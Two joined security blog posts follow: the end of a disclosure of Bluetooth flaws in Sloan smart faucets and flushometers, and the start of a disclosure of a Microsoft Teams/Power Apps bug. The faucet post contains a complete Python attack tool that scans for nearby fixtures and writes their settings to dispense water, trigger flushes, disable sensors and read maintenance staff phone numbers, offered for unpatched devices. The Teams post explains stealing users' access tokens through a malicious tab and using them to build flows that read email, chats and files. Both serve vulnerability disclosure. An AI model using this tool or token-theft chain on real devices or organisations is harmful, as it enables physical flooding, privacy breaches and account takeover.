  • Secure Boot refers to the verification of the authenticity of the application image in main flash on every boot of the device.
  • Secure Firmware Upgrade refers to the verification of the authenticity of an upgrade image before performing a bootload, and optionally enforcing that upgrade images are encrypted.

If none of those are selected by the developer, it’s possible to write any firmware to the device. As the faucet was quite expensive, I did not test firmware update and am merely pointing out that it’s exposed.

Using one of the SILabs android apps, we can quickly see that it’s possible to do an OTA firmware update. No telling what the firmware in place is checking for. I don’t want to break this thing yet.

I also grepped through the android apk but don’t see anything that references the three OTA variable names. I guess they’ll implement updates in the future. This makes me think that the OTA feature uses stock code from the SDK.

Hardware — BLE Adapters

These vulns should be exploitable via any BLE adapter, but since hardware can be finicky, the specific adapters I tested with are:

Cyberkinetic Effects or Why should I even care

Sure, turning on the water might not be the next million dollar ransomware campaign, and flushing the toilets remotely seems like a great prank, but not much more. Still, there can be real interesting effects. First off, these faucets aren’t usually for home use, but installed in office buildings, in groups. Turning on all of the faucets repeatedly or flushing all of the toilets could possibly cause a flooding condition. Move over SYN flood, this is a sink flood.

But these devices aren’t networked! They have no IP! They’re limited by range! These are great points. However, the faucet likely has a 30 foot BLE range. This is well within range of some miscreant standing at their local donut shop near the office. A neighboring unit in a condo or apartment building would also be well within range. Also, most laptops and desktops include bluetooth adapters, so any malware infection is a potential vector. I always like to point out that a BLE device is only a hop away from any modern laptop.

Findings

Enable Water Dispense > Kinetic Effect, Change Flow Rate > Kinetic Effect, Change Activation Mode / Time > Kinetic Effect / DoS, Change Sensor Range to 0 > DoS, Maintenance Person Cell Phone Number Modification and Disclosure > Information Leakage, Enable Toilet Flush > Kinetic Effect, Model Number is writable > Modification of Assumed Immutable Data

PoC || GTFlow

Here’s a quick proof of concept in case you’ve got an unpatched faucet or flushometer lying around. As of this posting, Sloan has not responded to our disclosure emails and to our knowledge has not released an update.

from bluepy.btle import Scanner, DefaultDelegate, Peripheral, UUID, BTLEDisconnectError, BTLEGattError, BTLEManagementError, BTLEInternalError
SCAN_TIMEOUT = 2.0
DEBUG = 0
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c965")
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_FLOW_RATE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c949")
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MAXIMUM_ON_DEMAND_RUN_TIME = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c945");
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_METERED_RUN_TIME = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c944");
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MODE_SELECTION = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c943");
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_SENSOR_RANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c942");
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_FIRMWARE_VERSION = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c906");
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_HARDWARE_VERSION = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c905");
UUID_CHARACTERISTIC_FAUCET_BD_DEVICE_INFO_MODEL_NUMBER = UUID("00002a24-0000-1000-8000-00805f9b34fb");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_BD_NOTE_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c932");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_INTERVAL_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c930");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_ON_OFF_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c92e");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_TIME_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c92f");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_FACTORY_RESET = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c929");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_OD_OR_M_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c92b");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c92a");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_METER_RUNTIME_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c92c");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_OD_RUNTIME_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c92d");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_FLUSHER_NOTE_CHANGE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88338");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_ACTIVATION_TIME_CHANGE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88337");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_DIAGNOSTIC = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88335");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FACTORY_RESET = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88331");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FIRMWARE_UPDATE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88336");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FLUSH_VOLUME_CHANGE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88334");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_LINE_SENTINAL_FLUSH_CHANGE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88333");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88332");
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_FIRMWARE_VERSION = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c90e");
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_HARDWARE_VERSION = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c90d");
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_MANUFACTURING_DATE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c90c");
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SERIAL = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c90b");
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SKU = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c90F");
AQUIS_UUIDS = (
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_FIRMWARE_VERSION,
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_HARDWARE_VERSION,
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_MANUFACTURING_DATE,
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SERIAL,
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SKU
)
UUID_CHARACTERISTIC_APP_IDENTIFICATION_LOCK_STATUS = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c953");
UUID_CHARACTERISTIC_APP_IDENTIFICATION_PASS_CODE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c954");
UUID_CHARACTERISTIC_APP_IDENTIFICATION_TIMESTAMP = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c951");
UUID_CHARACTERISTIC_APP_IDENTIFICATION_UNLOCK_KEY = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c952");
LOCK_INFO = (
UUID_CHARACTERISTIC_APP_IDENTIFICATION_LOCK_STATUS,
UUID_CHARACTERISTIC_APP_IDENTIFICATION_PASS_CODE,
UUID_CHARACTERISTIC_APP_IDENTIFICATION_TIMESTAMP,
UUID_CHARACTERISTIC_APP_IDENTIFICATION_UNLOCK_KEY,
)
FAUCET_PHONE_UUIDS = (
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_BD_NOTE_CHANGE,
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_INTERVAL_CHANGE,
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_ON_OFF_CHANGE,
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_TIME_CHANGE,
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_FACTORY_RESET,
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_OD_OR_M_CHANGE,
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE,
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_METER_RUNTIME_CHANGE,
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_OD_RUNTIME_CHANGE,
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_FLUSHER_NOTE_CHANGE,
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_ACTIVATION_TIME_CHANGE,
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_DIAGNOSTIC,
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FACTORY_RESET,
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FIRMWARE_UPDATE,
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FLUSH_VOLUME_CHANGE,
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_LINE_SENTINAL_FLUSH_CHANGE,
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE,

)
UUID_CHARACTERISTIC_OTA_CONTROL = UUID("f7bf3564-fb6d-4e53-88a4-5e37e0326063");
UUID_CHARACTERISTIC_OTA_DATA_TRANSFER = UUID("984227f3-34fc-4045-a5d0-2c581f81a153");
OTA = (
UUID_CHARACTERISTIC_OTA_CONTROL,
UUID_CHARACTERISTIC_OTA_DATA_TRANSFER,
)
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_1 = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c94a");
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_2 = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c94b");
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_3 = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c94c");
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_4 = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c94d");
NOTES = (
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_1,
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_2,
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_3,
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_4,
)
UUID_CHARACTERISTIC_FAUCET_DIAGNOSTIC_COMMUNICATION_STATUS = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c969");
UUID_CHARACTERISTIC_FAUCET_DIAGNOSTIC_SOLAR_STATUS = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c968");
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_BATTERY_LEVEL_AT_DIAGNOSTIC = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c966");
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_DATE_OF_DIAGNOSTIC = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c967");
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_INIT = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c961");
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_SENSOR_RESULT = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c962");
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_TURBINE_RESULT = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c964");
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_VALVE_RESULT = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c963");
DIAG = (
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_BATTERY_LEVEL_AT_DIAGNOSTIC,
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_DATE_OF_DIAGNOSTIC,
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_INIT,
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_SENSOR_RESULT,
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_TURBINE_RESULT,
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_VALVE_RESULT,
UUID_CHARACTERISTIC_FAUCET_DIAGNOSTIC_COMMUNICATION_STATUS,
UUID_CHARACTERISTIC_FAUCET_DIAGNOSTIC_SOLAR_STATUS,
)
UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_ACTIVATE_VALVE_ONCE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88361");
UUID_CHARACTERISTIC_FAUCET_BD_PRODUCTION_MODE_PRODUCTION_ENABLE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c971");
UUID_CHARACTERISTIC_FAUCET_BD_PRODUCTION_MODE_ADAPTIVE_SENSING_ENABLE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c978");
UUID_CHARACTERISTIC_BATTERY_LEVEL = UUID("00002a19-0000-1000-8000-00805f9b34fb");
UUID_CHARACTERISTIC_FAUCET_BD_BATTERY_LEVEL = UUID("00002a19-0000-1000-8000-00805f9b34fb");
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_BATTERY_LEVEL_AT_DIAGNOSTIC = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c966");
UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_BATTERY_LEVEL_AT_DIAGNOSTIC = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88364");
BATTERY_INFO = (
UUID_CHARACTERISTIC_BATTERY_LEVEL,
UUID_CHARACTERISTIC_FAUCET_BD_BATTERY_LEVEL,
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_BATTERY_LEVEL_AT_DIAGNOSTIC,
UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_BATTERY_LEVEL_AT_DIAGNOSTIC,
)
ATTACKS_DICT = {
"0": ("Dispense Water", UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE, "Enter a 1 to begin Dispensing water: "),
"1": ("Flush Toilet", UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_ACTIVATE_VALVE_ONCE, "Enter a 1 to begin flushing diagnostic: "),
"2": ("Change Faucet Flow Rate", UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_FLOW_RATE, "Enter two digits together, they'll be a float (11 will be 1.1lpm): "),
"3": ("Change Faucet Activation Mode", UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MODE_SELECTION, "Enter a 0 (ondemand) or a 1 (metered) to change the activation mode.: "),
"4": ("Change Faucet OnDemand Run Time", UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MAXIMUM_ON_DEMAND_RUN_TIME, "Enter 2 digits (10 = 10 seconds): "),
"5": ("Change Faucet Metered Run Time", UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_METERED_RUN_TIME, "Enter 3 digits (120 = 120 seconds): "),
"6": ("Change Sensor Range", UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_SENSOR_RANGE, "Enter 1 digit (0 to disable sensor): "),
"7": ("Read Maintenance Personnel Info", FAUCET_PHONE_UUIDS, "N/A"),
"8": ("Change Model Number", UUID_CHARACTERISTIC_FAUCET_BD_DEVICE_INFO_MODEL_NUMBER, "Enter a new model number: "),
"9": ("OTA (doesn't write)", OTA, "N/A"),
"10": ("Read HW", UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_HARDWARE_VERSION, "N/A"),
"11": ("Read FW", UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_FIRMWARE_VERSION, "N/A"),
"12": ("Read AQUIS Info", AQUIS_UUIDS, "N/A"),
"13": ("Read Locking Information", LOCK_INFO, "N/A"),
"14": ("Read Diagnostic Info", DIAG, "N/A"),
"15": ("Read NOTES", NOTES, "N/A"),
"16": ("Write NOTES", NOTES, "Enter something to write to the 4 notes fields:"),
"17": ("Production Enable", UUID_CHARACTERISTIC_FAUCET_BD_PRODUCTION_MODE_PRODUCTION_ENABLE, "Write something to production enable: "),
"18": ("Adaptive Sensing Enable (gain/sensitivity changes not implemented)", UUID_CHARACTERISTIC_FAUCET_BD_PRODUCTION_MODE_ADAPTIVE_SENSING_ENABLE, "Write to Adaptive Sensing Enable: "),
"19": ("Read Battery Info", BATTERY_INFO, "N/A"),
}
class ScanDelegate(DefaultDelegate):
def __init__(self):
DefaultDelegate.__init__(self)
#def handleDiscovery(self, dev):
#if dev
def convert_num_for_writing(text):
if len(text) > 4:
return text.encode()
output = b''
#for letter in text:
# output = output + str(hex(ord(letter)))[2:4].encode()
output = text.encode()
return output
def run_sink_flood(attack, target, p):
attack_name = attack[0]
uuid = attack[1]
text = attack[2]
target_name = target["name"]
if type(uuid) == UUID:
char = p.getCharacteristics(uuid=uuid)
if char[0].supportsRead() and attack_name != "Dispense Water":
val = char[0].read()
print(f"[ >] {target_name} responds with current value: {val}")
if not text == "N/A":
sendme = input(text)
sendme = convert_num_for_writing(sendme)
char[0].write(sendme, withResponse=True)
else:
for i in uuid:
try:
char = p.getCharacteristics(uuid=i)
if char[0].supportsRead():
val = char[0].read()
print(f"[ >] {target_name} responds with current value: {val}")
if not text == "N/A":
sendme = input(text)
sendme = convert_num_for_writing(sendme)
char[0].write(sendme, withResponse=True)
except BTLEGattError:
pass
def menu_pick_attack(target):
for attack in ATTACKS_DICT.keys():
print(f"[{attack}] {ATTACKS_DICT[attack][0]}")
selection = input("Enter a #: ")
return ATTACKS_DICT[selection]
def menu_pick_device(devices):
menu = {}
i = 1
target = None
for dev in devices:
for (adtype, desc, value) in dev.getScanData():
if desc == "Complete Local Name":
if type(value) == str and "FAUCET" in value:
menu["%s" % i] = {"name": value,"dev": dev}
i += 1
options = menu.keys()
if not options:
return None
sorted(options)
for entry in options:
print(f"[{entry}] {menu[entry]['dev'].addr} {menu[entry]['name']} ")
selection = input("Enter a device #: ")
if selection in menu.keys():
target = menu[selection]
return target
def lescan():
scanner = Scanner(1).withDelegate(ScanDelegate())
try:
print(f"[*] scanning for {SCAN_TIMEOUT}")
devices = scanner.scan(SCAN_TIMEOUT)
except BTLEManagementError:
print("[*] Permission to use HCI unavailable, rerun with sudo or as root.")
return
return devices
def main():
print("[*] starting SINK FLOOD Sloan SmartFaucet and SmartFlushometer tool")
while True:
found_devices = lescan()
if found_devices:
target = menu_pick_device(found_devices)
if not target:
continue
p = Peripheral(target['dev'].addr)
#p = Peripheral('08:6b:d7:20:9d:4b')
while target:
attack = menu_pick_attack(target)
run_sink_flood(attack, target, p)
else:
print("[*] target not found. have you tried turning it off and on again?")
continue
else:
print("[*] something's not write. exiting.")
exit()
if __name__ == "__main__":
main()

Plumbing the Depths of Sloan’s Smart Bathroom Fixture Vulnerabilities was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Stealing tokens, emails, files and more in Microsoft Teams through malicious tabs

14 June 2021 at 13:03

Trading up a small bug for a big impact

Intro

I recently came across an interesting bug in the Microsoft Power Apps service which, despite its simplicity, can be leveraged by an attacker to gain persistent read/write access to a victim user’s email, Teams chats, OneDrive, Sharepoint and a variety of other services by way of a malicious Microsoft Teams tab and Power Automate flows. The bug has since been fixed by Microsoft, but in this blog we’re going to see how it could have been exploited.

In the following sections, we’ll take a look at how we, as baduser(at)fakecorp.ca, a member of the fakecorp.ca organization, can create a malicious Teams tab and use it to eventually steal emails, Teams messages, and files from gooduser(at)fakecorp.ca, and send emails and messages on their behalf. While the attack we will look at has a lot of moving parts, it is fairly serious, as the compromise of business email is said to have cost victims $1.8 billion in 2020.

As an example to get us started, here is a quick clip of this method being used by Bad User to steal a Word document from Good User’s private OneDrive for Business.

Teams Tabs, Power Apps and Power Automate Flows

If you are already familiar with Teams and the Power Platform, feel free to skip this section, but otherwise, it may be useful to go over the pieces of the puzzle we’ll be using later.

Microsoft Teams has a default feature that allows a user to launch small applications as a tab in any team they are part of. If that user is part of an Office 365/Teams organization with a Business Basic license or above, they also have access to a set of Teams tabs which consist of Microsoft Power Apps applications.

A Teams tab with the Bulletins Power App

Power Apps are part of the wider Microsoft Power Platform, and when a user of a particular team launches their first Power App tab, it creates what Microsoft calls a “Dataverse for Teams Environment”, which according to Microsoft “is used to store, manage, and share team-specific data, apps, and flows”.

It should also be noted that, apart from the team-specific environments, there is a default environment for the organization as a whole. This is important because users can only create connectors and flows in either the default environment, or for teams which they own, and the attack we’re going to look at requires the ability to create Power Automate flows.

Power Automate is a service which lets users create automated workflows which can operate on their Office 365 organization’s data. For example, these flows can be used to do things like send emails on a particular schedule, or send Microsoft Teams messages any time a file on Sharepoint is updated.

Power Automate flow templates

The bug: trusting a bad domain

When a Power App tab is first created for a team, it runs through a deployment process that uses information gathered from the make.powerapps.com domain to install the application to the team dataverse/environment.

Installing the app

Teams tabs generally operate by opening an iframe to a page on a domain which is specified as trusted in that application’s manifest. What we see in the above image is a tab that contains an iframe to the page apps.powerapps.com/teams/makerportal?makerPortalUrl=https://make.powerapps.com/somePageHere, which itself is opening an iframe to the make.powerapps.com page passed in makerPortalUrl.

Immediately upon seeing this I was curious if I could make the apps.powerapps.com page load our own content. I noticed a couple of things:

  1. The apps.powerapps.com page will only load the iframe to makerPortalUrl if it is in a Microsoft Teams tab (it uses the Microsoft Teams javascript client sdk).
  2. The child iframe would only load if the makerPortalUrl begins with https://make.powerapps.com

We can see this happen if we view the page’s source, testing out different parameters. Trying to load any url which doesn’t begin with https://make.powerapps.com results in the makerPortalUrl being set to an empty string. However, the validation stops at checking whether the domain begins with make.powerapps.com, and does not check whether it is the full domain.

So, if we set makerPortalUrl equal to something like https://make.powerapps.com.fakecorp.ca/ we will be able to load our own content in the iframe!

Cool, we can load an iframe with our own content two iframes deep in a Teams tab, but what does that get us? Microsoft Teams already has a website tab type which lets you load an iframe with a URL of your choosing, and with those you can’t do much. Fortunately for us, some tabs have more capabilities than others.

Stealing auth tokens with postMessage

We can load our own content in an iframe, which itself is sitting in an iframe on apps.powerapps.com. The reason this is more interesting than something like the Website tab type on Teams is that for Power App extension tab types, the app.powerapps.com page communicates both with Teams, by way of the Teams JS SDK, as well as its child iframe using javascript postMessage.

We can communicate with the parent window via postMessage

Using a Chrome extension, we can watch the postMessages passed between windows as an application is installed and launched. At first glance, the most interesting message is a postMessage from make.powerapps.com in the innermost window (the window which we are replacing when specifying our own makerPortalUrl) to the apps.powerapps.com window, with GET_ACCESS_TOKEN in the data.

The frame which we were replacing was getting access tokens from its parent window without passing any sort of authentication.

the child iframe requesting an access token via postMessage

I tested this same kind of postMessage from the make.powerapps.com.fakecorp.ca subdomain, and sure enough, I was able to grab the same access tokens. A handler is registered in the WebPlayer.EmbedMakerPortal.js file loaded by apps.powerapps.com which fetches tokens for the requested resource using the https://apps.powerapps.com/auth/onbehalfof endpoint, which in our testing is capable of grabbing tokens for:

- apihub.azure.com
- graph.microsoft.com
- dynamics apps subdomains
- service.flow.microsoft.com
- service.powerapps.com
Grabbing the access token from a page we control

This is a super exciting thing to see: A tab under our control which can be created in a public team can retrieve access tokens on behalf of the user viewing it. Let’s slow down for a moment though, because I forgot to show an important step: how did we get our own content in a tab in the first place?

Overwriting a Teams tab

I mentioned earlier that Teams tabs generally operate by opening an iframe to a page which is specified in the tab application’s manifest. The request to define what page is loaded by a tab can be seen when adding a new tab or even renaming a currently existing tab.

The PUT request for renaming a tab lets us change the tab url

The url being given in this PUT request is pointing to the Bulletins Power App which is installed in our team environment. To point the tab to our malicious content we simply have to replace that url with our apps.powerapps.com/teams/makerportal?makerPortalUrl=https://make.powerapps.com.fakecorp.ca page.

It should be noted that this only works because we are passing a url with a trusted domain (apps.powerapps.com) according to the application’s manifest. If we try to pass malicious content directly as the tab’s url, the tab will not load our content.

A short and inconspicuous proof of concept

While the attacks we will look at later are longer and overly noisy for demonstration purposes, let’s consider a very quick proof of concept of how we could use what we currently have to steal access tokens from unsuspecting users.

If we host a page similar to the following and overwrite a tab to point to it, we can grab users’ service.flow.microsoft.com token and send it to another listener we control, while also loading the original Power App in an iframe that matches the tab size. While it won’t look exactly like a normally-running Power App tab, it doesn’t look different enough to notice. If the application requires postMessage communication with the parent app, we could even act as a man-in-the-middle for the postMessages being sent and received by adding a message handler to the PoC.

During the loading you can see two spinning circles. The smaller one is our JS running.

Now that we know we can steal certain tokens, let’s see what we can do with them, specifically the service.flow.microsoft.com token we just stole.

Stealing more tokens, emails, messages and files

The reason we’re focused on the service.flow.microsoft.com token is because it can be used to get us access to more tokens, and to create Power Automate flows, which will allow us to access a user’s email from Outlook, Teams messages, files from OneDrive and SharePoint, and a whole lot more.

We will construct the attack, at a high level, by:

- Grabbing an extra set of tokens from api.flow.microsoft.com
- Creating connectors to the services we want to access.
- Consent on behalf of the victim user using first party logins
- Creating Power Automate flows on the victim user’s behalf which let us send/receive emails and teams messages, retrieve emails, messages and files.
- Adding ourselves (or a group we’re in) to the owners of the flow.
- Having the victim user send an email to us containing any information we need to access the flows.

For our example we’re going to be showing pieces of a proof of concept which creates:

- Office 365 (for outlook access), and Teams connectors
- A flow which lets us send emails as the user
- A flow which lets us get all Teams messages from channels the victim is in, and send messages on their behalf.

The api.flow.microsoft.com token bundle

The first stop on our quest to get access to everything the victim user holds dear is an api endpoint which will let us generate a handful of new access tokens. Sending an empty POST request to api.flow.microsoft.com/providers/Microsoft.ProcessSimple/environments/<environment>/users/me/onBehalfOfTokenBundle?api-version=2021–01–03 will let us grab the following tokens, with the following scopes:

the api.flow.microsoft.com token bundle
- graph.microsoft.com
- scope : Contacts.Read Contacts.Read.Shared Group.Read.All TeamsAppInstallation.ReadWriteForTeam TeamsAppInstallation.ReadWriteSelfForChat User.Read User.ReadBasic.All
- graph.microsoft.net
- scope : user_impersonation
- appservice.azure.com
- scope : user_impersonation
- apihub.azure.com
- scope : user_impersonation
- consent.msp.windows.net/logic-app-aad
- scope : user_impersonation
- service.powerapps.com
- scope : user_impersonation

Some of these tokens will become useful to us for constructing a larger attack (specifically the graph.microsoft.com and apihub.azure.com tokens).

Creating connectors and using first party logins

To create flows which let us take control of the victim’s services, we first need to create connectors for those services.

When a connector is created, a user can use a consent link to login via a login.microsoft.com popup and grant permissions for the service for which the connector is being made (like Office 365, Teams, or Sharepoint). Some connectors, however, come with a first party login url, which lets us bypass the regular interactive login process and authorize the connector using only the authorization tokens already gathered.

Creating a connector on the victim’s behalf takes only three requests, the final of which is a POST request to the first party login url, with the apihub.azure.com access token.

consenting to a connector with a stolen apihub.azure.com token

After this third request, the connector will be ready to use with any flow we create.

Creating a flow

Given the number of potential connector types, flow triggers, and actions we can perform, there are an endless number of ways that we could leverage this access. They range anywhere from simply forwarding every email which is received by the victim to the attacker, to only performing actions if a particular RSS feed updates, to creating REST endpoints that let us trigger any number of different actions in different services.

Additionally, if the organization happens to have premium Power Apps/Automate licensing, there are many more options available. It is honestly a very useful system (even if you’re not trying to exploit a whole Office 365 org).

